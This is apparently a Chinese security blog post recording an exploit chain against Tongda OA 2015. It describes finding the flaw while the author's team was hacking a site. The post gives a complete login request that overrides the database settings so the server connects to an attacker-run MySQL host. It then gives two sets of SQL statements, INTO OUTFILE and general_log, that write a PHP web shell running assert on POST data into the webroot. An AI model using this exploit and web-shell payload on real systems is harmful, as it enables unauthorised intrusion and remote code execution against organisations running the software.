OA – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Fri, 23 Aug 2019 01:23:28 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 记通达OA2015变量覆盖和getshell /web/515.html Thu, 09 Aug 2018 05:17:58 +0000 /?p=515 漏洞详情:http://www.anquan.us/static/bugs/wooyun-2016-0168661.html

团队一起日站的时候发现了一个oa,然后就一顿乌云找到了这个,成功getshell

变量覆盖

登录构造请求数据包

POST /logincheck.php HTTP/1.1
Host: xx.xx.com
Content-Length: 182
Cache-Control: max-age=0
Origin: http://xx.xx.com/
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xx.xx.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SID_1=8b3cb1d3; PHPSESSID=he68espbvu9oq0rgamruvhs114
Connection: close

USERNAME=admin&PASSWORD=&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=123.123.123.123&MYOA_MASTER_DB[user]=root&MYOA_MASTER_DB[pwd]=rootpassword&MYOA_MASTER_DB[db]=oa&encode_type=1&button=

其中的MySQL数据库链接配置需要自己搭建外网MySQL,并且开通root外链。

TD_OA.sql 下载导入

 

getshell

后台有 sql 导入功能, 有两种方法, 使用 into outfile 或者用 general_log

update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;
set global general_log = on;
set global general_log_file = '../webroot/test.php';
select '<?php assert($_POST[a]) ?>';
set global general_log = off;

 

]]>